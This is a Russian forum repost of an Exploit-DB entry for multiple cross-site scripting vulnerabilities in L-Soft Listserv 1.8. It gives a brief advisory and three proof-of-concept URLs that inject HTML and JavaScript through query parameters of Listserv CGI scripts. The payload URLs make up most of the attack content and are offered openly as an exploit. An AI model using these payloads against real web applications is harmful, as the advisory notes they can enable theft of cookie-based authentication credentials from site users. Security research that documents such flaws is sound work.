Exploit L-Soft 1.8 - Listserv Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
23485
Проверка EDB
  1. Пройдено
Автор
HTTP-EQUIV
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
null
Дата публикации
2003-12-26
Код:
source: https://www.securityfocus.com/bid/9307/info

Multiple cross-site scripting vulnerabilities have been reported in L-Soft Listserv. An attacker may exploit these issues by embedding hostile HTML and script code in a link to a site hosting the software. This could permit theft of cookie-based authentication credentials or other attacks. These issues could also provide an attack vector for latent vulnerabilities in web browser software. 

http://www.example.com/SCRIPTS/WA-MSD.EXE?A0=<IMG%
20SRC=javascript:document['write'](location)>&T=malware is in the
zone<object>

http://www.example.com/SCRIPTS/WA-USIAINFO.EXE?
A1=<img>ind0312d&L=dosback

http://www.example.com/Scripts/wa-demo.exe?A1=ind9807&L=demo<img>
 
Источник
www.exploit-db.com

Похожие темы